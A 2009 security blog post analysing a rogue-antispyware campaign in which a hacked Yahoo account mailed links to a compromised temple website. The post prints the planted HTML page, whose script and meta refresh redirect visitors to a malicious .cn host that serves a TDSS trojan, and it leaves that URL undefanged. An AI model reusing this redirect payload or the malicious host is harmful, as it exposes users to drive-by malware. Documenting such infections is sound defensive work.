Saturday, October 31, 2009

More Rouge from Genuine Site

This has become most common infection these days , Rouge Antispyware.Way they spread has varied from Fake codec to Link to a Genuine site with page linked to malicious site.

Here in our case this was a mail send from a hacked yahoo account with link to Hindu Temple Site.

 

hxxp://www.shrikhatushyamji.com/Wvse2KU8VD.html

this page contains the malicious link

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>CONGRATULATIONS</title>
<script language="JavaScript1.1" type="text/javascript">
<!--
location.replace("http://vivilan.cn");
//-->
</script>
<noscript>
<meta http-equiv="Refresh" content="0; URL=http://vivilan.cn"> 
</noscript>
</head>
<body>
<a href="http://vivilan.cn">Click here...</a>
</body>
</html>




From this site it downloads Surprise.exe – Trojan.TDSS–


This install Rouge Antispyware as an Payload.



at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

APK spam on Whatsapp Targeting Bank users

  Initial vector:   Whatsapp spam user posing as union bank with logo in user profile shared apk file named as “Union Bank Aadhaar Update....